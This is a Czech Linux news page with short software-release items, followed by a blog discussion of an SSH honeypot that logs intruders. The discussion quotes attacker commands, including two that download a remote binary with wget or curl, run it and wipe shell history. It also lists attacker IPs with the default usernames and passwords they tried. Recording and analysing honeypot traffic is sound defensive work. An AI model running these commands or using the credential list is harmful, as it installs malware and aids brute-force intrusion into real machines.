Homebrew (Wikipedie), správce balíčků pro macOS a od verze 2.0.0 také pro Linux, byl vydán ve verzi 4.5.0. Na stránce Homebrew Formulae lze procházet seznamem balíčků. K dispozici jsou také různé statistiky.
Byl vydán Mozilla Firefox 138.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 138 je již k dispozici také na Flathubu a Snapcraftu.
Šestnáctý ročník ne-konference jOpenSpace se koná 3. – 5. října 2025 v Hotelu Antoň v Telči. Pro účast je potřeba vyplnit registrační formulář. Ne-konference neznamená, že se organizátorům nechce připravovat program, ale naopak dává prostor všem pozvaným, aby si program sami složili z toho nejzajímavějšího, čím se v poslední době zabývají nebo co je oslovilo. Obsah, který vytvářejí všichni účastníci, se skládá z desetiminutových
… více »Richard Stallman přednáší ve středu 7. května od 16:30 na Technické univerzitě v Liberci o vlivu technologií na svobodu. Přednáška je určená jak odborné tak laické veřejnosti.
Jean-Baptiste Mardelle se v příspěvku na blogu rozepsal o novinkám v nejnovější verzi 25.04.0 editoru videa Kdenlive (Wikipedie). Ke stažení také na Flathubu.
TmuxAI (GitHub) je AI asistent pro práci v terminálu. Vyžaduje účet na OpenRouter.
Byla vydána nová verze R14.1.4 desktopového prostředí Trinity Desktop Environment (TDE, fork KDE 3.5, Wikipedie). Přehled novinek i s náhledy v poznámkách k vydání. Podrobný přehled v Changelogu.
Bylo vydáno OpenBSD 7.7. Opět bez písničky.
V Tiraně proběhl letošní Linux App Summit (LAS) (Mastodon). Zatím nesestříhané videozáznamy přednášek jsou k dispozici na YouTube.
Tiskni
Sdílej:
13:26:38 $ /gweerwe323f 13:26:38 $ 13:26:38 $ /bin/busybox cp; /gweerwe323f 13:26:38 $ 13:26:38 $ mount ;/gweerwe323f 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon 13:26:38 $ 13:26:38 $ /gweerwe323f 13:26:38 $ 13:26:38 $ cat /bin/echo ;/gweerwe323f 13:26:38 $A takto vypada datum, cas, geolokace IP, IP, pocet sezeni, username, password:
2018-03-08 14:05:42 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:40 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:39 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:38 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:38 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 13:26:37 185.234.218.242 30 admin motorola 2018-03-08 12:59:30 POL - 188.125.43.186 1 ethos live 2018-03-08 12:59:29 POL - 188.125.43.186 1 root live 2018-03-08 11:08:51 185.234.218.242 32 root 1234 2018-03-08 10:19:06 USA - 192.200.218.166 1 root zxc123$ 2018-03-08 10:19:05 USA - 192.200.218.166 1 root zxc123$ 2018-03-08 01:53:05 185.234.218.242 30 admin admin1 2018-03-08 00:59:23 185.234.218.242 30 user user 2018-03-07 23:28:07 185.234.218.242 0 usuario usuario 2018-03-07 20:33:47 185.234.218.242 32 root 12345 2018-03-07 19:50:26 185.234.218.242 32 root ubnt 2018-03-07 19:23:26 USA - 192.200.218.166 1 root 12345 2018-03-07 19:23:24 USA - 192.200.218.166 1 root 12345 2018-03-07 19:20:49 185.234.218.242 30 admin default 2018-03-07 19:00:22 185.234.218.242 32 root password 2018-03-07 16:45:31 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:29 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:28 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:27 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:26 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 15:41:13 185.234.218.242 32 root xmhdipc 2018-03-07 13:53:48 185.234.218.242 30 admin password 2018-03-07 13:42:02 USA - 192.200.218.166 1 root 0p9o8t 2018-03-07 13:42:01 USA - 192.200.218.166 1 root 0p9o8t 2018-03-07 10:03:00 185.234.218.242 0 service service 2018-03-07 09:39:09 185.234.218.242 30 admin pfsense 2018-03-07 09:15:53 USA - 173.14.84.113 2 pi raspberry 2018-03-07 09:15:52 USA - 173.14.84.113 2 pi raspberryraspberry993311 2018-03-07 09:15:50 USA - 173.14.84.113 1 pi raspberry 2018-03-07 09:15:50 USA - 173.14.84.113 1 pi raspberryraspberry993311 2018-03-07 09:11:44 185.234.218.242 30 admin default 2018-03-07 08:50:22 185.234.218.242 32 root 123456 2018-03-07 08:04:05 185.234.218.242 32 root uClinux 2018-03-07 07:40:28 185.234.218.242 32 root 111111 2018-03-06 22:19:23 KOR - 119.192.239.192 1 ethos live 2018-03-06 22:19:19 KOR - 119.192.239.192 1 root live 2018-03-06 19:58:08 JPN - 118.241.240.233 2 pi raspberryraspberry993311 2018-03-06 19:58:07 JPN - 118.241.240.233 2 pi raspberry 2018-03-06 19:58:03 JPN - 118.241.240.233 1 pi raspberryraspberry993311 2018-03-06 19:58:02 JPN - 118.241.240.233 1 pi raspberry 2018-03-04 21:30:50 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:37 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:26 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:13 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:01 CHN - 222.186.172.48 1 root root
.nippon
? To je honeypot test na permissions?
$ rm -f /tmp/run;if [ `getconf LONG_BIT` -eq 64 ];then u="http://www.bizqsoft.com/tp2/r6.log";else u="http://www.bizqsoft.com/tp2/r.log";fi;(wget -O /tmp/run $u || curl -o /tmp/run $u || python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')");echo > ~/.bash_history;chmod 0777 /tmp/run && /tmp/run;rm -rf /tmp/run
/gweerwe323f. Jinak do toho nipponu se zapisuje "Grop" jako ascii, google napoví. Já bych teda zkoušel něco jako .bash_history sice poutá víc pozornosti (teda pokud uživatel vypisuje i tečkový hidden soubory), ale dá se zase ospravedlnit bugem s $HOME. Vypadá to že to je prostě jen test oprávnění. Ony embedded systémy často můžou bejt readonly.
<trolling>
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu kdy se prihlasi na server a zadavaji ruzne prikazy. Tyto jsou pak zaznamenany zrovnatak jako uzivatelska jmena, hesla a lze si pocist co se hackerovi/robotovi honi hlavou. Toto je docela zajimava vec.
A jestlipak od těch nebožáků máš souhlas se zpracováním osobních údajů v souladu s GDPR? :-D
</trolling>
/etc/motd
za nějaký legal banner podobně jako to už nějakou dobu musí dělat v usa.
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec meduToto je hyenismus nejhrubšího zrna. Ti lidé nejsou žádní útočníci, ale běženci!!! Ve své zemi nemají dostatek serverů, na kterých by se mohli realizovat, a tak hledají útočiště u nás. Proč automaticky předpokládáte, že vám chtějí škodit?? Místo, abyste se choval jako obyčejný xenofob a nácek, byste jim měl pomoci, podělit se o svůj nadbytek a poskytnout jim prostor na svém serveru. Oni vám vůbec škodit nemusí - a můžou vám naopak třeba obohatit operační systém nějakým skriptem nebo binárkou, ze kterých se něco naučíte, nebo které můžete sám používat. Nebo díky nim získáte kontakty na jiné servery, na které se jde připojit... Třeba taky jednou budete potřebovat pomoc, tak na to myslete, než se příště budete chovat zase takhle sobecky.
$ #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://199.231.68.230/ys808e curl -O http://199.231.68.230/ys808e chmod +x ys808e ./ys808eVirustotal rika toto